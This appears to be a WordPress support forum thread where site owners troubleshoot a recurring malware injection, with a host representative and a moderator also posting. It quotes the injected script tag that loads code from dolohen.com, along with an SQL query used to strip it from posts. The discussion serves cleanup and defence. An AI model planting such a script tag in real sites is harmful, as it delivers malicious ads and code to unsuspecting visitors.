Most likely it is included in the premium rules. Are you using the premium version with updated rules?
No I’m only using the free version
Hi @slhatton,
I took a look at your website at https://hattonwillow.co.uk/ and found this:
<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script>
I believe this may have been injected into your /wp-includes/functions.php file.
Can you do a search for dolohen within that file?
Dave
Hi Dave,
Thanks for your reply.
That is the script that is appearing all over my website. I’ve taken a backup using filezilla and run a search for dolohen. It found three results and I’ve removed that script from those files. It was not in the /wp-includes/functions.php file
Also could you please remove my website address from your reply as I don’t want it to appear in google search results.
Any other ideas?
Thanks
-
This reply was modified 7 years, 1 month ago by
slhatton.
I literally spent hours and hours on this on Friday night. I completely cleaned my website using phpmyadmin and also the better search replace plugin and it was clean.
I replaced all my core wordpress files. I also replaced every plugin with files downloaded from the wordpress repository. I went through all my server log files to try and find out how they were getting in. I changed every password, database, control host, email, website.
My website was clean for 3 days, showing on sucuri, wordfence and gotmls as clean. I’ve had a few 500 errors on my website this weekend. I logged a call with tsohost and they disabled woocommerce saying it was conflicting with another plugin. I’ve gone on my website and you guessed it, the dolohen.com adverts are popping up again.
Disappointed to say the least. Hours wasted. I think it’s no coincidence that we are all with tsohost. I have told them if they don’t take it seriously I will move to another host.
My database server also ends in 247!!!
I had two files that were infected on my website which were yith gift card files.
I have just re-opened the malware ticket that I had opened with tsohost. The person couldn’t even find the adverts so I don’t hold out much hope. I told him to open my website and click on any link!!!
I think we are all on the same range of database servers. Andrew?
To remove the adware from my database I’m running a find and replace through PHPmyadmin on the wp_posts table. This is the SQL code it uses:
UPDATE wp_posts SET post_content = REPLACE(post_content, ‘<script type=”text/javascript” src=”//dolohen.com/apu.php?zoneid=676630″ async data-cfasync=”false”></script>’, ”) WHERE post_content LIKE ‘%<script type=”text/javascript” src=”//dolohen.com/apu.php?zoneid=676630″ async data-cfasync=”false”></script>%’ COLLATE utf8mb4_bin
Obviously this won’t make a difference if it gets infected again straight away.
It took them an hour and a half to come back and say it’s not their fault!!!
I have further investigated the case with our seniors and this dolohen hack seems to be quite the new occurrence.
I found a topic which breaks it down a bit –
http://medericburlet.com/dolohem-wordpress-malware/
Most of our databases begin with 10.169.0, so that won’t be the pattern here.
Please also keep in mind that all cases are on WP CMS, which makes this more related to a WP vulnerability, than to our database servers.
I can also recommend following https://www.wordfence.com/blog/ and https://blog.sucuri.net/ for any updates and vulnerability updates from popular web security specialists.
I completely understand your concerns in regards to our servers, but i can assure you our database servers are fully secured and no breach was detected whatsoever as of now. We are still looking further into the case and we will make sure to get to the bottom of this supposed security breach, whether it’s related to us or to WordPress on our hosting.
Make sure to keep all your plugins updated to the latest version, as well as your WordPress version to the latest one, as that is the best way to be as secured as possible.
Moderator
Jan Dembowski
(@jdembowski)
Forum Moderator and Brute Squad
If you are a Wordfence customer, if you have posted tickets on their site then continue that conversation there.
These forums are not for any customers and I’ve archived all of the replies from this topic. I’ve also flagged some of the accounts as users we’re informed to start their own topic instead.
If you are not a Wordfence customer and just a user then feel free to start your own topic here.
But do not pile onto other people’s topics saying “lets keep replying to get a reply from Wordfence”. Start your own topic instead.
